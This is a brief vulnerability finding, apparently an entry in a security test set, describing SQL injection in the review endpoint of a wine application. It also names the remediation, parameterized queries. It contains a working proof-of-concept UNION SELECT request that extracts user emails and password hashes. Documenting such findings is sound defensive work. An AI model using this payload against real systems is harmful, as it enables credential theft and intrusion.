SQL Injection - Wine Reviews

Vuln ID TP-004 Title SQL Injection - Wine Reviews Severity critical Type SQLi HTTP Method GET URL /wines/:id/reviews Parameter id Filename - Code Location backend/api/models/Review.php -> getByWineId() line 16

Description

The wine ID is directly concatenated into the SQL query when fetching reviews.

Proof of Concept

GET /wines/0 UNION SELECT 1,email,password_hash,name,5,6 FROM users--/reviews

Remediation

Use a parameterized query.